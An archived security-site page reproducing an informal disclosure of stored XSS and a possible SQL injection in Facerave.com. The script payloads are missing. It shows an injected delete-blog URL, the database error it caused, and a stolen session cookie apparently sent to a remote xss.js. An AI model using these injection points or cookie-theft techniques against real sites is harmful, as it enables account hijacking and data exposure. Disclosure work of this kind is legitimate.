Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: b06-3107.htm

Facerave.com - XSS & sessions disclosure



Facerave.com - XSS & sessions disclosure
Facerave.com - XSS & sessions disclosure



Facerave.com=0D
=0D
Homepage:=0D
http://www.facerave.com=0D 
=0D
Effected files:=0D
=0D
* Profile input boxes=0D
=0D
- Self Description box=0D
=0D
* Posting a blog entry=0D
=0D
* Sending a message=0D
=0D
index.php=0D
------------------------------------------------------=0D
=0D
XSS vuln with cookie disclosure via posting a comment:=0D
=0D
No filter evasion needed. for PoC in yourself description box put:=0D
=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/facerave1.jpg=0D 
http://www.youfucktard.com/xsp/facerave2.jpg=0D 
=0D
-----------------------------------------------------=0D
=0D
XSS vuln with cookie disclosure when posting a blog entry:=0D
=0D
Same as above:=0D
=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/facerave3.jpg=0D 
http://www.youfucktard.com/xsp/facerave4.jpg=0D 
=0D
Our cookie:=0D
=0D
This is remote text via xss.js located at youfucktard.com lang=en; PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9; last_pr=7454=0D
=0D
=0D
Breaking down the cookie:=0D
=0D
PHPSESSID= (Our php session Id on the site)=0D
=0D
voted= Base64 encoded. When we decode it we get:=0D
=0D
a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6=0D
=0D
=0D
----------------------------------------------------=0D
=0D
XSS Vuln and possible SQL injection on deleting blog id:=0D
=0D
">=0D">http://www.facerave.com/index.php?req=blog&act=del&id=1087">">=0D 
=0D
Query error msg:=0D
You have an error in your SQL syntax near '\' AND b_user=7454' at line 1=0D
Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454=0D
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/facerave5.jpg=0D 
=0D
-----------------------------------------------------=0D
=0D
Sending a message xss vuln:=0D
=0D
Same as above, no filter evasion. in your msg title or subject put:=0D
=0D 
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/facerave6.jpg=0D 
------------------------------------------------------


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH